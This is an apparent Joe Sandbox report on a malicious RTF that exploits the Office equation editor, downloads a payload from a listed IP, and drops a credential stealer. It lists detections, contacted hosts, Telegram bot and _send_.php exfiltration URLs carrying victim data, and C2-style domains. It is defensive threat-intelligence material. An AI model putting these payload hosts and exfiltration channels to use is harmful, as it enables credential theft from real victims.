                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Process Discovery                		SSH1
                Input Capture                		24
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials31
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry                		Proc Filesystem1
                Remote System Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow1
                System Network Configuration Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Process Injection                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1558704 Sample: Xkl0PnD8zFPjfh1.wiz.rtf Startdate: 19/11/2024 Architecture: WINDOWS Score: 100 46 Initial sample is an obfuscated RTF file 2->46 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 25 other signatures 2->52 8 WINWORD.EXE 291 18 2->8         started        process3 process4 10 EQNEDT32.EXE 11 8->10         started        15 EQNEDT32.EXE 8->15         started        dnsIp5 36 87.120.84.39, 49161, 80 SHARCOM-ASBG Bulgaria 10->36 26 C:\Users\user\...\wealthcharliebgk.exe, PE32 10->26 dropped 28 C:\Users\user\...\Xkl0PnD8zFPjfh1[1].exe, PE32 10->28 dropped 64 Office equation editor establishes network connection 10->64 66 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->66 17 wealthcharliebgk.exe 1 8 10->17         started        file6 signatures7 process8 signatures9 38 Antivirus detection for dropped file 17->38 40 Multi AV Scanner detection for dropped file 17->40 42 Machine Learning detection for dropped file 17->42 44 2 other signatures 17->44 20 wealthcharliebgk.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process10 dnsIp11 30 reallyfreegeoip.org 20->30 32 api.telegram.org 20->32 34 8 other IPs or domains 20->34 54 Installs new ROOT certificates 20->54 56 Tries to steal Mail credentials (via file / registry access) 20->56 58 Tries to harvest and steal browser information (history, passwords, etc) 20->58 signatures12 60 Tries to detect the country of the analysis system (by using the IP) 30->60 62 Uses the Telegram API (likely for C&C communication) 32->62

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Xkl0PnD8zFPjfh1.wiz.rtf45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                Xkl0PnD8zFPjfh1.wiz.rtf100%AviraHEUR/Rtf.Malformed

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe100%AviraHEUR/AGEN.1306879
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe100%AviraHEUR/AGEN.1306879
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe32%ReversingLabs
                C:\Users\user\AppData\Roaming\wealthcharliebgk.exe32%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exej0%Avira URL Cloudsafe
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC:0%Avira URL Cloudsafe
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC:0%Avira URL Cloudsafe
                http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exe0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		188.114.97.3
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    checkip.dyndns.com
                    		193.122.130.0
                    		truefalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.75false
                          		high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://checkip.dyndns.org/false
                              		high
                              http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exetrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://duckduckgo.com/chrome_newtabwealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/ac/?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfwealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgwealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.entrust.net/server1.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://api.telegram.org/botwealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&iwealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.entrust.net03wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exettC:EQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.diginotar.nl/cps/pkioverheid0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002483000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002562000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchwealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exejEQNEDT32.EXE, 00000002.00000002.360779526.000000000064F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://reallyfreegeoip.org/xml/8.46.123.754wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://varders.kozow.com:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/favicon.icowealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://aborters.duckdns.org:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20awealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/sorry/indexwealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000350D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003567000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000361B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.com/search?q=wmfwealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://anotherarmy.dns.army:8081wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/qwealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://reallyfreegeoip.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://reallyfreegeoip.orgwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000024D5000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26awealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/search?q=netwealthcharliebgk.exe, 00000008.00000002.876897343.0000000003542000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/sorry/indextestwealthcharliebgk.exe, 00000008.00000002.876897343.000000000351A000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003552000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000035CE000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.0000000003606000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://checkip.dyndns.comwealthcharliebgk.exe, 00000008.00000002.876070304.0000000002529000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000259E000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002590000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000257D000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002546000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002554000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002536000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://api.telegram.orgwealthcharliebgk.exe, 00000008.00000002.876070304.00000000025AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.entrust.net0Dwealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewealthcharliebgk.exe, 00000005.00000002.371713149.0000000002465000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://secure.comodo.com/CPS0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://87.120.84.39/txt/Xkl0PnD8zFPjfh1.exeC:EQNEDT32.EXE, 00000002.00000003.360572542.000000000067B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.360779526.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://crl.entrust.net/2048ca.crl0wealthcharliebgk.exe, 00000008.00000002.875720695.0000000000555000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026CD000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.000000000346B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.00000000026BA000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.000000000268B000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876897343.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002678000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedwealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://reallyfreegeoip.org/xml/wealthcharliebgk.exe, 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, wealthcharliebgk.exe, 00000008.00000002.876070304.0000000002496000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              132.226.8.169
                                                                                                              		unknownUnited States
                                                                                                              		16989UTMEMUSfalse
                                                                                                              149.154.167.220
                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                              		62041TELEGRAMRUfalse
                                                                                                              188.114.97.3
                                                                                                              		reallyfreegeoip.orgEuropean Union
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              87.120.84.39
                                                                                                              		unknownBulgaria
                                                                                                              		51189SHARCOM-ASBGtrue
                                                                                                              188.114.96.3
                                                                                                              		unknownEuropean Union
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              193.122.130.0
                                                                                                              		checkip.dyndns.comUnited States
                                                                                                              		31898ORACLE-BMC-31898USfalse
                                                                                                              158.101.44.242
                                                                                                              		unknownUnited States
                                                                                                              		31898ORACLE-BMC-31898USfalse
                                                                                                              132.226.247.73
                                                                                                              		unknownUnited States
                                                                                                              		16989UTMEMUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1558704
                                                                                                              Start date and time:2024-11-19 18:07:08 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 9m 11s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                              Number of analysed new started processes analysed:14
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:Xkl0PnD8zFPjfh1.wiz.rtf
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.troj.spyw.expl.evad.winRTF@9/14@29/8
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 33.3%
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 99%
                                                                                                              • Number of executed functions: 126
                                                                                                              • Number of non-executed functions: 130
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .rtf
                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                              • Attach to Office via COM
                                                                                                              • Active ActiveX Object
                                                                                                              • Scroll down
                                                                                                              • Close Viewer
                                                                                                              • Override analysis time to 76695.0518958658 for current running targets taking high CPU consumption
                                                                                                              • Override analysis time to 153390.103791732 for current running targets taking high CPU consumption

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                                              • Execution Graph export aborted for target EQNEDT32.EXE, PID 3600 because there are no executed function
                                                                                                              • Execution Graph export aborted for target wealthcharliebgk.exe, PID 3860 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • VT rate limit hit for: Xkl0PnD8zFPjfh1.wiz.rtf

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              12:08:00API Interceptor281x Sleep call for process: EQNEDT32.EXE modified
                                                                                                              12:08:04API Interceptor9027303x Sleep call for process: wealthcharliebgk.exe modified
